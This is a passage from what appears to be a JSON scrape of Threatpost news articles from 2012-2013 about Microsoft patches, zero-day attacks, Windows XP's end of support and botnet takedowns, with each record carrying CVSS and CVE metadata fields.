vulnerability and a memory corruption issue leading to remote code execution.\n\nWhat differentiates this attack from other watering hole attacks is that victims are not subject to malicious iframes or traffic-redirects to attacker-controlled sites and further malware downloads. Instead, McRAT is injected directly into memory, a new twist on advanced targeted attacks.\n\n\u201cBy using memory-only methods, the attack is exceptionally difficult for network defenders to detect, when trying to examine and confirm which endpoints are infected, using traditional disk-based forensics methods,\u201d said Darien Kindlund, FireEye director of threat intelligence.\n\nMicrosoft said a number of mitigations are available to IE users as a mitigation until a patch is applied, namely setting security zone settings to \u201cHigh\u201d to block ActiveX Controls and Active Scripting, though users could experience some usability issues. IE can also be configured to prompt a user before running Active Scripting. The Enhanced Mitigation Experience Toolkit (EMET) is also a viable mitigation, Microsoft said.\n\nThe IE patch is one of eight bulletins scheduled for tomorrow, three of those rated critical. The scheduled security updates, however, will not include a patch for the Windows TIFF zero day being actively exploited in attacks primarily in Pakistan. The vulnerability in several Windows and Office versions is being exploited in [targeted attacks](<http://threatpost.com/microsoft-warns-of-targeted-attacks-on-windows-0-day/102821>) against Windows XP systems running Office 2007. Microsoft released a [Fix-It](<https://support.microsoft.com/kb/2896666>) tool as a stopgap measure until a patch is released out of band or with the December security updates.\n", "cvss3": {}, "published": "2013-11-11T17:54:28", "type": "threatpost", "title": "IE Zero Day Patch Already in November Patch Tuesday Updates", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-11-12T22:11:19", "id": "THREATPOST:C1850156F9F2124BACDC7601CCFA6B30", "href": "https://threatpost.com/microsoft-ie-zero-day-patch-among-november-patch-tuesday-updates/102898/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:59:53", "description": "Forget for a moment the impending cryptoapocalypse because of aging and/or subverted encryption standards and algorithms. Microsoft this week put out the word on the scourge that is Windows XP.\n\nThe latest [Microsoft Security Intelligence Report](<http://www.microsoft.com/security/sir/default.aspx>) goes to great pains to encourage users to move off the soon-to-be unsupported version of Windows. The report, reflecting activity collected and monitored by its security tools from January to June, points out that XP computers are six times more likely to be infected than younger, more robust versions of the OS.\n\n\u201cOlder software is easier to break into and over time, cybercriminals learn how to bypass mitigations,\u201d said Microsoft spokesperson Holly Stewart. \u201cXP is no different. A good example is DEP (Data Execution Prevention) which was not commonly bypassed when it was released. The utility of that mitigation has degraded year over year.\u201d\n\nDEP and Address Space Layout Randomization (ASLR) are memory protections built into Windows starting with Vista. They\u2019re meant to ward off buffer overflow attacks and frustrate hackers from being able to inject code into predictable areas of memory in the operating system. In 2006, there was one DEP bypass for every 13 vulnerabilities; that\u2019s done almost an about-face as of 2012, Microsoft said, with six bypasses happening for every three CVEs. Hackers have been found ingenious means of beating DEP and ASLR, stringing together exploits for numerous vulnerabilities to bypass these protections and jeopardize data stored on the host machine.\n\n\u201cNewer software is less appealing to cybercriminals,\u201d Stewart said. \u201cAdvanced technology is harder to exploit, and there\u2019s been a long list of platform security improvements. XP, however, is not equipped to provide these innovations.\u201d\n\nMicrosoft will no longer support XP after next April, meaning it will no longer provide security patches and advisories for vulnerabilities discovered on the platform. Yet according to the latest desktop operating system market share numbers, XP installations trail only Windows 7; Netmarketshare.com says XP is still running on 31 percent of desktops. Windows 7 leads with 46.4 percent.\n\n\u201cFrom a security perspective, this is a really important milestone,\u201d Stewart said. \u201cAttackers will start to have a greater advantage over defenders. There were 30 security bulletins for XP this year, which means there would have been 30 zero-day vulnerabilities on XP [without support].\u201d\n\nMicrosoft is also using a new metric, comparing infection rates with what it\u2019s calling an encounter rate. As explained in the Security Intelligence Report, \u201cencounters\u201d are the number of times one of the companies security tools such as the Microsoft Malicious Software Removal Tool comes up against a piece of malware. Previously, Microsoft would count what it called Computers Cleaned per Mile, or CCM. Thes was the number of computers cleaned for every 1,000 times the MSRT was tripped by a piece of malware.\n\nUsing the new metrics, Microsoft demonstrates that XP users running SP3 are six times more likely to become infected than someone running Windows 8 RTM on their machine\u20149.1 XP computers cleaned per 1,000 versus 1.6 Windows 8 machines. As for the encounter rate, the numbers aren\u2019t too staggeringly different with 16.1 percent of XP SP3 machines reporting an encounter versus 19.1 percent of Windows 7 machines and 12.4 percent of Windows 8 computers.\n\n\u201cThe encounter rate gives you an idea of how frequently a customer is exposed to a malware threat,\u201d Stewart said. \u201cWe\u2019ve reached a tipping point where this dated architecture can\u2019t be relied upon.\u201d\n", "cvss3": {}, "published": "2013-11-01T14:07:56", "type": "threatpost", "title": "Windows XP End of Life a Security Milestone", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-11-06T21:46:51", "id": "THREATPOST:B5B59F74FDFACADB44DBF4AE420E3189", "href": "https://threatpost.com/microsoft-xp-end-of-life-an-important-security-milestone/102789/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:00:03", "description": "[](<https://media.threatpost.com/wp-content/uploads/sites/103/2013/10/07040458/andrew_storms.jpg>)On Oct. 9, 2003, Microsoft announced its new security patching process that would end up being a catalyst for significant change in the information security community. Ten years ago, the program was announced with a press release that promised\n\n * \u201cImproved patch management processes, policies and technologies to help customers stay up to date and secure.\u201d\n * \u201cGlobal education programs to provide better guidance and tools for securing systems.\u201d\n\nWithin the [press release](<http://www.prnewswire.com/news-releases/microsoft-outlines-new-initiatives-in-ongoing-security-efforts-to-help-customers-72447792.html>), chief executive officer Steve Ballmer said: \u201cOur goal is simple: Get our customers secure and keep them secure. Our commitment is to protect our customers from the growing wave of criminal attacks.\u201d\n\nThose of us working in the security industry or with corporate information security responsibility saw this as a direct response from the famous [Trustworthy Computing memo](<http://www.microsoft.com/en-us/news/features/2012/jan12/gatesmemo.aspx>) penned by Bill Gates in January 2002. The signs were clear. Microsoft was faced with a serious dilemma. Its software was riddled with security holes that were having a direct negative effect on its customers\u2019 security, availability and privacy. In corporate IT, Microsoft had quickly gotten its own nickname of \u201cnecessary evil.\u201d IT managers were forced to use Microsoft software for its business features, but it came at the cost of serious security risks.\n\nWhether you have like or disdain for Microsoft, the new security initiatives started 10 years ago created a great wave of change in our information security industry.\n\nFor starters, Microsoft proved to the security community that communication is a key cornerstone to vendor relationships. No one likes to admit they have security problems. Microsoft took the leap of not only admitting it had a problem, but also committed to delivering ongoing communications to its customers and to all computing users. Microsoft started blogging about security issues and also embarked on serious outbound communication campaigns to educate users.\n\nMicrosoft showed that communication and relationships are a two-way street. The powerhouse eventually grew to an age where it embraced the same community of people who were responsible for finding and publicly releasing security holes in its software. Today public disclosure of serious Microsoft security holes is now the exception.\n\nAlso, resource planning is table stakes in the enterprise IT world. Being a cost center doesn\u2019t help much, but IT has traditionally been underfunded and underappreciated. What is an enterprise IT or security manager supposed to do when their primary software vendor springs on them a critical security patch with do-or-die consequences? Historically, and still the case today, a lot of ongoing projects get dropped to quickly reallocate resources to the moment\u2019s critical security patch. Living in a world of constant interruption is detrimental to morale completion of any planned projects.\n\nWith Microsoft\u2019s new consistent patch release timing, enterprise IT could depend on a schedule and allocate resources accordingly. The monthly patching cycle soon became better known as Patch Tuesday. Later in Microsoft\u2019s maturity model, it would introduce the advanced notification service. We know this today as the Thursday before Patch Tuesday, when we receive a high level snippet of what to expect the following week.\n\nMicrosoft also proved value with consistency in other ways. For example, Microsoft took the early bold step of defining its security criticality ratings and made the definitions public. Even Microsoft\u2019s security bulletin text format and sections were delivered in a consistent format that security professionals have come to rely upon. Security people like repeatable and dependable systems. Microsoft delivered just that.\n\nThree cheers to Patch Tuesday. It\u2019s the second Tuesday of each month that we both love and hate. Ten years ago, the Patch Tuesday initiatives created profound benefits to all Microsoft consumers by making it easier to keep systems patched and more secure. At the time, the idea seemed so foreign, but has since gained so much following that other vendors such as Cisco, Adobe and Oracle have followed suit. Spend just five minutes today and consider where you\u2019d be today without Microsoft taking the leap 10 years ago.\n\n_Andrew Storms is the Director of DevOps for CloudPassage.___\n", "cvss3": {}, "published": "2013-10-02T09:40:46", "type": "threatpost", "title": "A Decade of Microsoft Patch Tuesday Security Updates", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-10-07T15:44:02", "id": "THREATPOST:1327F2449E675DB6F1F90EDB766B1DC8", "href": "https://threatpost.com/take-time-to-reflect-as-microsoft-patch-tuesday-turns-10/102488/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:00:20", "description": "Microsoft announced Wednesday afternoon that it has pulled [MS13-061](<https://technet.microsoft.com/en-us/security/bulletin/ms13-061>), one of the patches issued yesterday for vulnerabilities in Exchange Server 2013.\n\nMicrosoft said the patch is causing issues with the content index for mailbox databases. Organizations would still be able to send and receive email, but would not be able to search for messages on the server.\n\n\u201cAfter the installation of the security update, the content index for mailbox databases shows as Failed and the Microsoft Exchange Search Host Controller service is renamed,\u201d Microsoft principal program manager Ross Smith said in a [post](<http://blogs.technet.com/b/exchange/archive/2013/08/14/exchange-2013-security-update-ms13-061-status-update.aspx>) on the company\u2019s Exchange site.\n\nSmith added that patches for Exchange 2007 and 2010 were not pulled back because both use a different indexing architecture and are not impacted.\n\nOrganizations that have already installed the patch are urged to follow the steps outlined in a [Knowledge Base article](<http://support.microsoft.com/kb/2879739>) released today as a workaround until a new patch is available. The workaround involves the editing of two separate registry keys.\n\nExperts, however, think the number of companies immediately applying the patch could be relatively low given the criticality of Exchange servers to enterprises. Most likely, an Exchange patch, even a critical one, would have been reserved for a maintenance window overnight or on a weekend.\n\nThe patch was essentially the integration of an Oracle patch released last month for Outside In, a technology that turns unstructured file formats such as PDFs into normalized files. Outside In is part of Exchange\u2019s WebReady Document Viewing and Data Loss Prevention features.\n\nAn attacker would be able to exploit the vulnerability in question if a user opened or previewed a malicious file attachment using Outlook Web Access (OWA) giving the attacker the same privileges as the victim on the Exchange Server.\n\n\u201cThis is a fairly important patch in terms of criticality given that it\u2019s the mail server and not a workstation,\u201d said Qualys CTO Wolfgang Kandek.\n\nThe issue is amplified because with the OWA module on Exchange, the browser pulls a message into Exchange and using Outside In, processes the message on Exchange exposing the server to attack.\n\nKandek said organizations that don\u2019t allow OWA or turn off a visualization mode that renders documents are not affected; documents such as PDFs instead would be processed by a reader such as Adobe or Foxit avoiding the attack vector.\n\nIn the meantime, Kandek said he hopes Microsoft is transparent about the reason for faulty patch and why it wasn\u2019t caught in testing.\n\n\u201cI think it\u2019s important because we tell people they should install patches as quickly as possible,\u201d Kandek said. \u201cWhen a patch breaks, that\u2019s an issue.\u201d\n\nThe Exchange patch was one of three critical bulletins sent out yesterday in Microsoft\u2019s August Patch Tuesday updates.\n", "cvss3": {}, "published": "2013-08-14T16:51:00", "type": "threatpost", "title": "Faulty Microsoft Exchange Server 2013 Patch Pulled Back", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-08-14T20:51:00", "id": "THREATPOST:44FF4D429457B43FB0FEA96C9A0DE58C", "href": "https://threatpost.com/microsoft-pulls-back-critical-exchange-server-2013-patch/101999/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:00:20", "description": "Microsoft took less than a month to incorporate an [Oracle Outside In patch](<http://threatpost.com/hefty-oracle-july-critical-patch-update-contains-89-patches/101370>) and fix a critically rated remote code execution bug in Exchange Servers. The Microsoft patch is among three critical bulletins\u2014eight overall\u2014released today as part of [its August 2013 Patch Tuesday security updates](<http://blogs.technet.com/b/msrc/archive/2013/08/13/leaving-las-vegas-and-the-august-2013-security-updates.aspx>).\n\nOracle patched Outside In with its [July Critical Patch Update (CPU)](<http://www.oracle.com/technetwork/topics/security/cpujuly2013-1899826.html#AppendixFMW>); the technology allows developers to turn unstructured file formats into normalized files. [MS13-061](<https://technet.microsoft.com/en-us/security/bulletin/ms13-061>) includes the Outside In Patch, which is part of the WebReady Document Viewing and Data Loss Prevention features on Exchange Servers. Exploits could allow an attacker to remotely execute code if a user previews or opens a malicious file using Outlook Web App (OWA). The attacker would have the same privileges as the transcoding services on the Exchange Server; that would be the LocalService account for WebReady Document Viewing and the Filtering Management service for the DLP feature. Both, however, run with minimal privileges.\n\n\u201cIf you run Exchange and your users have OWA, you should address this issue as quickly as possible,\u201d said Qualys CTO Wolfgang Kandek. Microsoft also recommends a workaround that turns off Outside In document processing.\n\n[MS13-059](<https://technet.microsoft.com/en-us/security/bulletin/ms13-059>) is another cumulative patch for Internet Explorer and repairs 11 remotely executable vulnerabilities in the browser, including a sandbox bypass vulnerability discovered and exploited by VUPEN researchers during the Pwn2Own contest in March. IE 6-10 is vulnerable to exploit; Microsoft said it is not aware of any active exploits for any of these vulnerabilities.\n\nThe IE rollup includes patches for nine memory corruption vulnerabilities, as well as fixes for a privilege escalation flaw in the way in which the browser handles process integrity level assignment and an information disclosure cross-site scripting vulnerability in EUC-JP character encoding, Microsoft said.\n\n\u201cAs usual with IE vulnerabilities, the attack vector would be a malicious webpage, either exploited by the attacker or it could be sent to the victim in a spear-phishing e-mail,\u201d Kandek said. \u201cPatch this immediately as the highest priority on your desktop system and wherever your users browse the web.\u201d\n\nThe final critical bulletin, [MS13-060](<https://technet.microsoft.com/en-us/security/bulletin/ms13-060>), patches a Windows vulnerability in the Unicode Scripts Processor; the patch corrects the way Windows parses certain OpenType font characteristics. An exploit could allow an attacker to run code remotely if a user opens a malicious document or visits a website that supports OpenType fonts.\n\n\u201cA user would have to be induced to open a malicious file and this only affects Windows XP and 2003,\u201d said Ross Barrett, senior manager of security engineering at Rapid7. \u201cBoth of these issues should be patched ASAP.\u201d Microsoft also recommends two workarounds: either modifying the usp10.dll Access Control List to be more restrictive, or disabling support for parsing embedded fonts in IE.\n\nThe remaining bulletins were all rated Important by Microsoft.\n\n * [MS13-062](<https://technet.microsoft.com/en-us/security/bulletin/ms13-062>) patches a privilege escalation vulnerability in Windows RPC, correcting the manner in which Windows handles asynchronous RPC messages. \u201cPerhaps the most genuinely interesting vulnerability this month,\u201d Barrett said, adding that the bug is a post authentication issue in RPC. \u201cMicrosoft has described this as extremely difficult to exploit, which I can only assume is a challenge to exploit writers everywhere to prove them wrong.\u201d\n * [MS13-063](<https://technet.microsoft.com/en-us/security/bulletin/ms13-063>) is another privilege escalation issue in the Windows kernel. Four vulnerabilities are patched in this bulletin, the most severe of which enables elevated privileges if an attacker is able to log in locally and run a malicious application. In addition to memory corruption bugs, one of the vulnerabilities in this bulletin enables an attacker to bypass Address Space Layout Randomization (ASLR), a memory protection native to the OS.\n * [MS13-064](<https://technet.microsoft.com/en-us/security/bulletin/ms13-064>) patches a denial of service vulnerability in Windows NAT Driver. An attacker would have to send a malicious ICMP packet to a server running the NAT Driver services in order to exploit this bug, which affects only Windows Server 2012.\n * [MS13-065](<https://technet.microsoft.com/en-us/security/bulletin/ms13-065>) also fixes a denial of service bug in ICMPv6; Vista, Windows Server 2008, Windows &amp;, Windows 8, Windows RT and Windows Server 2012 are affected by this bug.\n * [MS13-066](<https://technet.microsoft.com/en-us/security/bulletin/ms13-066>) patches an information-disclosure vulnerability in Active Directory Federation Services on Windows Server 2008 and Windows Server 2012. An exploit could force the service to leak information on the service and allow an attacker to use that information to try to log in remotely.\n", "cvss3": {}, "published": "2013-08-13T14:28:51", "type": "threatpost", "title": "August 2013 Microsoft Patch Tuesday Security Updates", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-08-13T18:28:51", "id": "THREATPOST:270516BE92D218A333101B23448C3ED3", "href": "https://threatpost.com/microsoft-august-patch-tuesday-addresses-critical-ie-exchange-and-windows-flaws/101981/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:00:22", "description": "Another month, another set of [Microsoft Patch Tuesday security updates](<http://technet.microsoft.com/en-us/security/bulletin/ms13-aug>) for Internet Explorer.\n\nFor what seems to be the umpteenth month in a row, Microsoft will patch its browser, one of three critical updates expected to be shipped on Tuesday among eight bulletins.\n\nWhile IE patches remain a constant in 2013, IT administrators and network managers also need to be aware of a critical set of patches for Microsoft Exchange Server 2013, as well as 2010 and 2007, both of which are on Service Pack 3.\n\nThe critical bugs in IE, Exchange Server and the Windows OS are all rated critical because they are remotely exploitable; it\u2019s unknown today how many are being actively exploited.\n\n\u201cAcross the board, all supported versions of Microsoft Exchange Server are affected by a critical vulnerability,\u201d said Tripwire security researcher Craig Young. \u201cIf I remember correctly, the last time we saw this was back in February when it was revealed that the transcoding service used to render content for Outlook Web Access sessions could be abused for remote code execution in the context of that service. Exchange servers are invariably connected to the Internet in some form or another so it\u2019s going to be urgent to patch this one post-haste.\u201d\n\n[MS13-012](<http://technet.microsoft.com/en-us/security/bulletin/ms13-012>), released in February, patched [vulnerabilities in the Exchange WebReady Document Viewing](<http://threatpost.com/microsoft-patches-critical-ie-vulnerabilities-021213/77519>) feature; if a user viewed a malicious file through OWA in a browser, an attacker could run code on the Exchange server remotely or crash the server.\n\nRoss Barrett, senior manager of security engineering at Rapid7, said the Exchange patches should be of the greatest concern to organizations.\n\n\u201cIf this is truly a remotely exploitable issue that does not require user interaction, then it\u2019s a potentially wormable issue and definitely should be put at the top of the patching priority list,\u201d Barrett said.\n\nIE, meanwhile, is about to be patched for the eighth time this year including an [out-of-band patch](<http://threatpost.com/out-band-ie-patch-released-more-sites-attacked-011413/77403>) in January to address exploits being used in a number of watering hole attacks.\n\nThe third critical bulletin addresses vulnerabilities in Windows XP and Windows Server 2003 that are remotely exploitable.\n\n\u201cFor some organizations this patch may be of less concern, if they have already moved to newer Windows versions,\u201d Barrett said.\n\nThe remaining bulletins are rated \u201cImportant\u201d by Microsoft based on whether they are remotely exploitable and whether exploits are in the wild. All of the \u201cImportant\u201d bulletins patch vulnerabilities in Windows; two of them are privilege escalation bugs, two are denial-of-service vulnerabilities and one information disclosure flaw.\n", "cvss3": {}, "published": "2013-08-08T15:28:06", "type": "threatpost", "title": "August 2013 Microsoft Patch Tuesday Security Updates", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-08-16T18:07:04", "id": "THREATPOST:4C788DAABFE70AE1D1483D4039B3767E", "href": "https://threatpost.com/critical-ie-exchange-updates-on-tap-in-august-patch-tuesday-release/101943/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:00:36", "description": "Dennis Fisher talks with Ryan Naraine about the new Microsoft bug bounty program, how it may affect prices for vulnerabilities on the private market and why it took the company so long to start the reward program.\n\n<https://media.threatpost.com/wp-content/uploads/sites/103/2013/06/07044809/digital_underground_116.mp3>\n\nDownload: [digital_underground_116](<https://media.threatpost.com/wp-content/uploads/sites/103/2013/06/07044126/digital_underground_116.mp3>)[ \n](<https://media.threatpost.com/wp-content/uploads/sites/103/2013/06/07044809/digital_underground_116.mp3>)\n", "cvss3": {}, "published": "2013-06-21T09:49:19", "type": "threatpost", "title": "Ryan Naraine on Microsoft's New Bug Bounty Program", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-07-16T20:41:20", "id": "THREATPOST:D49075D6FFF077A542015B7F806F4E27", "href": "https://threatpost.com/ryan-naraine-on-microsofts-bug-bounty-program/101053/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:00:41", "description": "**UPDATE** \u2013 Calling it the company\u2019s \u201cmost aggressive\u201d botnet operation operation to date, Microsoft has joined with the FBI for a massive disruption of the Citadel botnet.\n\nMore than 1,400 individual botnets associated with the Citadel malware affecting more than five million people in total were disrupted, with cooperation from the Federal Bureau of Investigation and interestingly, a civil seizure warrant issued by the U.S. District Court for the Western District of North Carolina.\n\nGroups like the Financial Services \u2013 Information Sharing and Analysis Center (FS-ISAC), NACHA \u2013 The Electronic Payments Association, the American Bankers Association (ABA) and Agari, an email phishing authentication firm, all helped chip in intelligence as well.\n\nWhile this was the seventh botnet operation of its kind coordinated by Microsoft, this is the first time the company has worked with the law enforcement sector to secure a civil seizure warrant to carry out its plans.\n\nRichard Boscovich, the Assistant General Counsel of Microsoft\u2019s Digital Crimes Unit wrote about the operation \u2013 codenamed Operation b54 \u2013 on [the company\u2019s Technet blog](<http://blogs.technet.com/b/microsoft_blog/archive/2013/06/05/microsoft-works-with-financial-services-industry-leaders-law-enforcement-and-others-to-disrupt-massive-financial-cybercrime-ring.aspx>) last night claiming the action won\u2019t fully eradicate the Citadel malware but should \u201csignificantly\u201d curb the botnet going forward.\n\n\u201cDue to Citadel\u2019s size and complexity, we do not expect to fully take out all of the botnets in the world using the Citadel malware,\u201d he wrote, \u201chowever, we do expect that this action will significantly disrupt Citadel\u2019s operation.\u201d\n\nTechnical details on the operation are somewhat scant but Microsoft says the operation culminated yesterday after officials from Microsoft, assisted by U.S. Marshalls helped remove servers from two data hosting facilities in New Jersey and Pennsylvania. The takedown was set into motion last week after the North Carolina court order successfully cut off communication between the Citadel botnets, 1,462 in total, and their infected machines.\n\nAgari, a Palo Alto-based email phishing authentication firm had a big hand in helping Microsoft obtain the seizure warrant.\n\nWhile the full operation took about a year, Agari spent six of those months poring over phishing emails that were pulling unsuspecting users into the Citadel botnet.\n\nAgari CEO Patrick Peterson described how the company helped monitoring emails that led to the seizure of the servers in Pennsylvania and New Jersey.\n\n\u201cOur whole system is designed to isolate these malicious emails and to get that forensic data for law enforcement, for our customers, for the industry to be able to track the bad guys,\u201d Patterson explained, \u201cIn this case working with our partners, the FBI, Microsoft, FS-ISAC, we were able to customize the focus of that specifically around that Citadel botnet.\u201d\n\nThe company monitored approximately 2.5 million malicious URLs every month and while not every one of those URLs led to the Citadel malware, all of them were pretending to come from a legitimate bank.\n\nAgari is part of FS-ISAC\u2019s Trusted Registry Program, a program dedicated to securing the emails the financial services industry sends out. FS-ISAC reached out to Microsoft about Agari\u2019s wealth of phishing emails and the company joined the investigation from there.\n\n\u201cI think it\u2019s a great day for everyone involved,\u201d Peterson said, \u201cIt\u2019s certainly a day when everyone on the internet is safer than they were yesterday and that doesn\u2019t happen very often.\u201d\n\nThe Citadel Trojan has been spotted mining all types of financial information, including banking logins and passwords since [being introduced a year and a half ago](<http://threatpost.com/citadel-malware-authors-adopt-open-source-development-model-020812/>). To date it\u2019s believed the botnet is responsible for more than half a billion dollars in financial loss.\n\nPeddled primarily on a handful of underground forums as a variant of the Zeus Trojan, the malware has long been cloaked in secrecy. Owners insist on distributing their kit among trusted insiders, [h0ping to keep law enforcement out and support costs down](<http://threatpost.com/citadel-trojan-updates-dynamic-config-mechanism-streamlines-fraud-activity-101812/>).\n\nMicrosoft has taken a hard line on cybercrime over the last several years and much of that is due to [the work being done by its Digital Crimes Unit](<http://threatpost.com/at-microsoft-a-sharpened-focus-on-cybercrime/>). The DCU, a collection of Microsoft engineers, security experts and lawyers, have proved successful at shutting down botnets that are largely dependent on a centralized infrastructure including Kelihos, Zeus, Waledac and Rustock.\n\nIn [a discussion with Threatpost\u2019s Dennis Fisher last month](<http://threatpost.com/qa-microsofts-tj-campana/>), T.J. Campana, the DCU\u2019s Director of Security claimed the group tries to take a transparent approach with their takedowns.\n\n\u201cWe\u2019re not just going out there shooting stuff. We walk in with a pile of legal documents. We\u2019re asking for a judge to agree with what we found,\u201d Campana said of the group\u2019s actions at the time.\n", "cvss3": {}, "published": "2013-06-06T13:38:55", "type": "threatpost", "title": "Operation b54 Knocks 1,000+ Citadel Botnets Offline", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-06-10T19:43:44", "id": "THREATPOST:AD20F9744EB0E2E4D282F681451B4FBD", "href": "https://threatpost.com/microsoft-authorities-disrupt-hundreds-of-citadel-botnets-with-operation-b54/100902/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:02:02", "description": "Microsoft announced Wednesday it will tweak the release of its forthcoming Windows 8 operating system to comply with the European Commission, which argues that in its current state, the software fails to offer customers a browser choice screen to let them \u201ceasily choose their preferred web browser.\u201d\n\nThe browser choice issue was also present in Windows 7 and according to the European Union antitrust commissioner Joaquin Almunia this morning, the EU has been in contact with Microsoft to ensure it doesn\u2019t repeat the same mistake.\n\nAccording to reports, Microsoft was advised to remedy the issue \u201cif they don\u2019t want to take the risk of a new investigation,\u201d Almunia [warned at press conference earlier today](<http://www.google.com/hostednews/afp/article/ALeqM5iXITc3iybCliakA7TZ496XmzPS5g?docId=CNG.8bb0ab94569c4cff3a09e64804358eaa.441>).\n\nThe EU initially took issue that Microsoft\u2019s Windows 7 Service Pack 1, released in February 2011, failed to offer users a choice, something the company has been legally bound to do in Europe since December 2009. After that ruling, the EU mandated that Microsoft display a choice screen to \u201caddress competition concerns.\u201d While the choice screen popped up in March 2010 as part of a five year agreement, from February 2011 to July 2012, the \u201cchoice screen\u201d disappeared from Windows.\n\n\u201cIf infringements are confirmed, Microsoft should expect sanctions,\u201d [Almunia warned in July](<http://europa.eu/rapid/press-release_IP-12-800_en.htm?locale=en>), when proceedings against Microsoft over the most recent issue were opened.\n\nMicrosoft claimed the lack of a \u201cchoice screen\u201d was a due to a technical error and claims it has taken steps to ensure the problem doesn\u2019t happen again. It will implement changes to Windows 8 before its release later this week, [the company acknowledged in a press release today](<http://www.microsoft.com/en-us/news/Press/2012/Oct12/10-24statement.aspx>).\n\nIn the U.S., Windows 8 is slated for release on Friday, while a tweaked version, Windows 8 Pro N will be released in Europe without Windows Media Player. Similar to the browser choice ruling, the EU ruled in 2004\u2019s \u201cMicrosoft competition case,\u201d that tying the player to Windows was an \u201cabuse of a dominant position.\u201d In response, the Microsoft had to release a version of its Windows software [with its flagship media player stripped out](<http://www.law.yale.edu/documents/pdf/The_Economists_Voice.pdf>). (.PDF)\n\nThe EU is known for taking a tougher stance toward user privacy than the U.S., along with enforcing its competition law \u2014 a law that is effectively the equivalent of the U.S.\u2019s antitrust law. The commission fined Microsoft twice, [in 2004 and 2008](<http://news.bbc.co.uk/2/hi/business/7266629.stm>) after it determined it had gained unfair market advantage with its Windows platform. \n", "cvss3": {}, "published": "2012-10-24T19:01:05", "type": "threatpost", "title": "Microsoft Agrees to Modify Windows 8 Following EU Complaint", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:31:20", "id": "THREATPOST:61AC6ABD7798785567FFEEBEF573CDF8", "href": "https://threatpost.com/microsoft-agrees-modify-windows-8-following-eu-complaint-102412/77151/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:02:02", "description": "[](<https://threatpost.com/nitol-infections-fall-malware-still-popping-102412/>)When Microsoft went after the [Nitol botnet](<https://threatpost.com/microsoft-carries-out-nitol-botnet-takedown-091312/>) in September, one of the key details in the investigation was the fact that much of the botnet was built by pre-loading malware onto laptops during the manufacturing process in China. This was the clearest case yet of the phenomenon of [certified pre-owned devices](<https://threatpost.com/new-study-sees-need-better-software-integrity-controls-061410/>) making their way through the supply chain and into the market. As it turns out, nearly half a million of those infected machines showed up here in the U.S.\n\nResearch from Microsoft into the location of the Nitol-infected machines shows that the large majority of them are in China, nearly 800,000 of them. That\u2019s more than 30 percent of all of the machines on which Microsoft detected the Nitol malware, and the company said that about one in every five machines purchased in China through the compromised supply chain had malware on it.\n\nAlthough the number of infected systems in the United States wasn\u2019t nearly as high as in China, Microsoft did find nearly 500,000 PCs in the U.S. loaded with Nitol, a pretty significant volume of infections.\n\n\u201cMMPC\u2019s infection figures for [Win32/Nitol](<http://www.microsoft.com/security/portal/Threat/Encyclopedia/Entry.aspx?Name=Win32/Nitol> \"MMPC Encyclopedia entry for Win32/Nitol\" ) reflect the Microsoft study, placing China on the top spot with a whopping 31.60%, way above the United States (18.51%) and Taiwan (16.79%). Thailand and Korea round out the top five,\u201d [Rex Plantodo of the Microsoft Malware Protection Center.](<https://blogs.technet.com/b/mmpc/archive/2012/10/22/msrt-october-12-nitol-by-the-numbers.aspx?Redirected=true>)\n\nMicrosoft began looking into the Nitol botnet more than a year ago after buying 20 laptops in China and discovering that some of them had been pre-loaded with the Nitol malware, as well as a few other pieces of malicious software. Nitol is a nasty bit of code and has quite a list of malicious capabilities. It has rootkit functionality and also can laucnh DDoS attacks on orders from a remote command-and-control server.\n\nMicrosoft\u2019s takedown of Nitol disrupted much of the botnet\u2019s operations, but it didn\u2019t completely eliminate it. The company\u2019s detections show a major drop in Nitol infections since September, but there are still more than 200,000 infections in October.\n\n \n\n", "cvss3": {}, "published": "2012-10-24T17:59:06", "type": "threatpost", "title": "Nitol Infections Fall, But Malware Still Popping Up", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:31:20", "id": "THREATPOST:C35731BF3D4A3F8D0B1A838FAD1A8832", "href": "https://threatpost.com/nitol-infections-fall-malware-still-popping-102412/77149/", "cvss": {"score": 9.3, "vector": 